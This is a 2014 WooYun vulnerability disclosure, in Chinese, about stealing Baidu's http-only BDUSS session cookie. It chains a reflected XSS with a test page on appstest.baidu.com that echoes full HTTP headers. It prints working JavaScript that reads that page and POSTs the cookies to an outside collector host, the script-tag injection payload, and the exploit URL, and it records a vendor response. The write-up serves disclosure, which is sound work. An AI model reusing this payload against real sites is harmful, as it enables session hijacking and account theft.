我是如何通过XSS窃取到百度受http-only保护的cookie的

漏洞详情

披露状态:

2014-02-22: 细节已通知厂商并且等待厂商处理中
2014-02-22: 厂商已经确认,细节仅向厂商公开
2014-03-04: 细节向核心白帽子及相关领域专家公开
2014-03-14: 细节向普通白帽子公开
2014-03-24: 细节向实习白帽子公开
2014-04-08: 细节向公众公开

简要描述:

BDUSS受http-only保护? 看我如何窃取到完整的cookie。

详细说明:

问题出在一个小漏洞上。

http://appstest.baidu.com/

百度移动客户端测试资源平台对外。上周提交到乌云的漏洞可能是因为审核员比较忙没有审核,这周我们来深挖一下。

01.jpg





http://appstest.baidu.com/http/echoheader.php

该测试页返回了完整的http头,其中也包括了完整的cookie。混贴吧圈的应该都知道BDUSS是最关键的字段,同时该字段是受http-only保护的,百度SRC之前也因此下调了XSS的评分标准。

02.jpg





这样,我们只要利用XSS平台的"指定页面源码读取"模块即可通过XSS获取用户的完整cookie。该模块代码如下:

var u = 'http://buv.me/index.php?do=api&id={projectId}';
var cr;
if (document.charset) {
cr = document.charset
} else if (document.characterSet) {
cr = document.characterSet
};
function createXmlHttp() {
if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest()
} else {
var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
for (var n = 0; n < MSXML.length; n++) {
try {
xmlHttp = new ActiveXObject(MSXML[n]);
break
} catch(e) {}
}
}
}
createXmlHttp();
xmlHttp.onreadystatechange = writeSource;
xmlHttp.open("GET", "http://appstest.baidu.com/http/echoheader.php", true);
xmlHttp.send(null);
function postSource(cc) {
createXmlHttp();
url = u;
cc = "mycode=" + cc;
xmlHttp.open("POST", url, true);
xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlHttp.setRequestHeader("Content-length", cc.length);
xmlHttp.setRequestHeader("Connection", "close");
xmlHttp.send(cc)
}
function writeSource() {
if (xmlHttp.readyState == 4) {
var c = new postSource(xmlHttp.responseText)
}
}





由于是用xmlHttpRequest的形式读源码,且 http://appstest.baidu.com/ 的 Access-Control-Allow-Origin 为空,即默认不允许跨域,所以我们必须在同域下才能用xmlHttpRequest获取到完整的cookie。

我在 http://wooyun.org/bugs/wooyun-2014-051026/trace/e80c9b4ecb9c252d6bdfdb21c335164d 中有提到, http://appstest.baidu.com/abnormalTest/abnormaTest.php?typeName=single 可以自由构造XSS。我们向该页面写入如下代码:

<title>wooyun.org</title>
<p>超威蓝猫@wooyun.org</p>
<script src=http://00f.me/XbSWCk></script>



成功窃取到包含BDUSS的完整cookie:

03.jpg



XSS收信平台收到了cookie:

04.jpg





最终的利用地址:

http://appstest.baidu.com/abnormalTest/abnormaTest.php?typeName=single

漏洞证明:

如上。

修复方案:

最关键的一点:测试用的后台不要对外。

另外 求份礼物(不要再发加湿器了..

版权声明:转载请注明来源 超威蓝猫@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-02-22 19:14

厂商回复:

感谢提交,我们立即联系业务部门处理此问题。

最新状态:

暂无


漏洞评价: